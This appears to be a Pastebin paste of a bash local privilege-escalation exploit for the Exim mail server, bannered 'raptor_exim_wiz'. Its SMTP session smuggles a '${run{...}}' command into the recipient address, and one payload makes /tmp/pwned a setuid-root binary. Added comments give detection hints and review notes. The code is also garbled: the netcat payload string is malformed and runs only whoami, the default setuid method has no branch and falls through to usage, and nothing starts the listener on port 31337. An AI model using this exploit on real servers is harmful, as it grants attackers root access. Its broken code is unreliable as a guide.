
Untitled

a guest Jun 20th, 2019 63 Never
  1. #!/bin/bash
  2. METHOD="setuid" # default method
  3. PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
  4. PAYLOAD_NETCAT='${run{\x2whoami\x22}}@localhost'
  #######################################
  # Show the command-line synopsis and the two -m values, then terminate.
  # Arguments: none
  # Outputs:   three help lines on stdout
  # Returns:   never returns; exits the shell with status 1
  #######################################
  function usage()
  {
      printf '%s\n' \
          "$0 [-m METHOD]" \
          "-m setuid : use the setuid payload (default)" \
          "-m netcat : use the netcat payload"
      exit 1
  }
  #######################################
  # payload delivery
  # Walks one SMTP session with the mail server on localhost:25 and puts
  # $PAYLOAD in the RCPT TO address. One reply line is read and echoed per step.
  # Globals:   PAYLOAD (read); REPLY (set by each `read`)
  # Arguments: none
  # Outputs:   the server's reply lines on stdout
  # Returns:   status of the last `read ... && echo` pair
  #
  # Detection notes (what this session looks like from the server side):
  #   - a loopback SMTP client sending "mail from:<>" (empty sender),
  #   - a recipient whose local part contains "${run{",
  #   - a message body consisting only of 31 numbered "Received:" lines.
  # NOTE(review): the reason for exactly 31 "Received:" lines is not shown in
  # this file; presumably it is meant to exceed a header-count limit on the
  # server - confirm against the advisory named in the banner.
  # NOTE(review): fd 3 is never closed, `read` is used without -r, $REPLY is
  # echoed unquoted, and a failed connect is not checked.
  #######################################
  function exploit()
  {
      # open a read/write TCP connection to localhost:25 on fd 3 (bash /dev/tcp)
      exec 3<>/dev/tcp/localhost/25
      # first read takes the server's line that precedes any command;
      # every later read/echo pair prints the reply to the command just sent
      read -u 3 && echo $REPLY
      echo "helo localhost" >&3
      read -u 3 && echo $REPLY
      # empty envelope sender
      echo "mail from:<>" >&3
      read -u 3 && echo $REPLY
      # the recipient address is where the payload string travels
      echo "rcpt to:<$PAYLOAD>" >&3
      read -u 3 && echo $REPLY
      echo "data" >&3
      read -u 3 && echo $REPLY
      # message content: 31 "Received: N" lines and nothing else
      for i in {1..31}
      do
          echo "Received: $i" >&3
      done
      # a lone "." ends the message data
      echo "." >&3
      read -u 3 && echo $REPLY
      echo "quit" >&3
      read -u 3 && echo $REPLY
  }
  # print banner
  echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
  echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
  # parse command line: only "-m VALUE" is accepted; any other argument
  # calls usage(), which exits with status 1
  while [ ! -z "$1" ]; do
      case $1 in
          # "-m" with no value stores an empty METHOD, caught by the -z test below
          -m) shift; METHOD="$1"; shift;;
          * ) usage
          ;;
      esac
  done
  # NOTE(review): $METHOD is unquoted here and in the comparison below, so a
  # value containing whitespace makes `[` fail with a syntax error.
  if [ -z $METHOD ]; then
      usage
  fi

  # Only "netcat" has a branch. The default METHOD ("setuid") falls through to
  # the else arm, so as pasted the script prints usage unless run with
  # "-m netcat", and PAYLOAD_SETUID is never delivered.
  if [ $METHOD = "netcat" ]; then
      # select and deliver the payload
      echo "Delivering $METHOD payload..."
      PAYLOAD=$PAYLOAD_NETCAT
      exploit
      # fixed 5-second pause, then a client connection to loopback port 31337.
      # NOTE(review): nothing in this file starts a listener on that port.
      # For detection: a local listener on 31337 or an `nc` to 127.0.0.1:31337
      # right after local SMTP traffic is an observable sign of this script.
      echo "Waiting 5 seconds..."
      sleep 5
      nc -v 127.0.0.1 31337
  # print help
  else
      usage
  fi